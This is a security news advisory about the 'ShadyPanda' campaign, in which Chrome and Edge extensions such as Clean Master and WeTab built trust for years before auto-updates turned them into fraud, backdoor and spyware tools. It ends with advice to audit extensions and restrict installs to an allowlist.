Table of Contents
Are your verified browser plugins secretly spying on you?
Security researchers at Koi.ai identified a massive malware campaign on December 1, 2025, compromising approximately 4.3 million users. The threat actor, designated “ShadyPanda,” leveraged the architecture of browser extension marketplaces to distribute malicious code. This operation targeted Google Chrome and Microsoft Edge users through a sophisticated, seven-year strategy of patience and deception.
The attack highlights a critical flaw in the digital supply chain: trust. ShadyPanda did not hack these browsers directly. Instead, they utilized legitimate channels to distribute “Clean Master” and “WeTab,” gaining “Verified” and “Featured” status from platform operators. Once installed on millions of devices, these extensions weaponized the automatic update feature to deploy malware.
The Strategy: Legitimacy as a Trojan Horse
ShadyPanda exploited the review protocols of Google and Microsoft. Marketplaces rigorously audit code upon initial submission but often lack continuous behavioral monitoring for subsequent updates.
- Establish Reputation (2018–2023): The group uploaded functional, benign extensions masquerading as wallpapers, cache cleaners, or productivity tools.
- Accumulate Users: By maintaining clean code for years, they earned marketplace endorsements and user trust, amassing over 300,000 installs for tools like “Clean Master.”
- Weaponize Updates (2024): Once the user base was significant, ShadyPanda pushed malicious code via background auto-updates. This bypassed the stringent initial review process, delivering malware directly to trusted environments.
Escalation of Threats
The campaign evolved from simple financial fraud to invasive surveillance and remote control.
Phase 1: Affiliate Fraud (2023)
Initial attacks focused on monetization through “cookie stuffing.” Extensions under publishers like nuggetsno15 and rocket Zhang silently injected tracking codes when users visited sites like Amazon, eBay, or Booking.com. This allowed the attackers to claim unearned commissions on user purchases while logging search queries via Google Analytics.
Phase 2: Remote Execution and Espionage (2024–2025)
The operation aggressively pivoted toward total browser compromise.
- RCE Backdoor: Five extensions, including “Clean Master,” gained the ability to download and execute arbitrary JavaScript hourly. This Remote Code Execution (RCE) capability allowed attackers to monitor all web traffic, exfiltrate encrypted history, and fingerprint devices.
- Mass Surveillance: The “WeTab” extension, currently installed on 3 million devices, functions as active spyware. It captures URLs, search queries, and mouse clicks, transmitting this data to servers in China (specifically Baidu and WeTab-controlled domains).
The Persistence of the Threat
While Google removed the identified Chrome extensions, the threat persists in the Microsoft Edge ecosystem. As of December 2025, extensions by Starlab Technology—the publisher behind the compromised Edge versions—remain available. The WeTab New Tab Page continues to operate, creating a live surveillance network of 4 million users.
Systemic Vulnerabilities and Enterprise Risk
This campaign demonstrates that the “auto-update” mechanism, designed for security patching, is now a potent attack vector.
For organizations, the risk extends beyond individual privacy. An infected developer workstation grants ShadyPanda visibility into internal networks. Because modern SaaS platforms, cloud consoles, and code repositories rely on browser-based authentication, these extensions can bypass traditional firewalls to harvest API keys, session tokens, and proprietary data.
Advisory Recommendation
Administrators and individuals must immediately audit installed extensions. Treat “Verified” badges with skepticism. If an extension is not essential for daily operations, remove it. For enterprise environments, enforce policies that restrict extension installation to a strict allowlist to prevent supply chain compromise.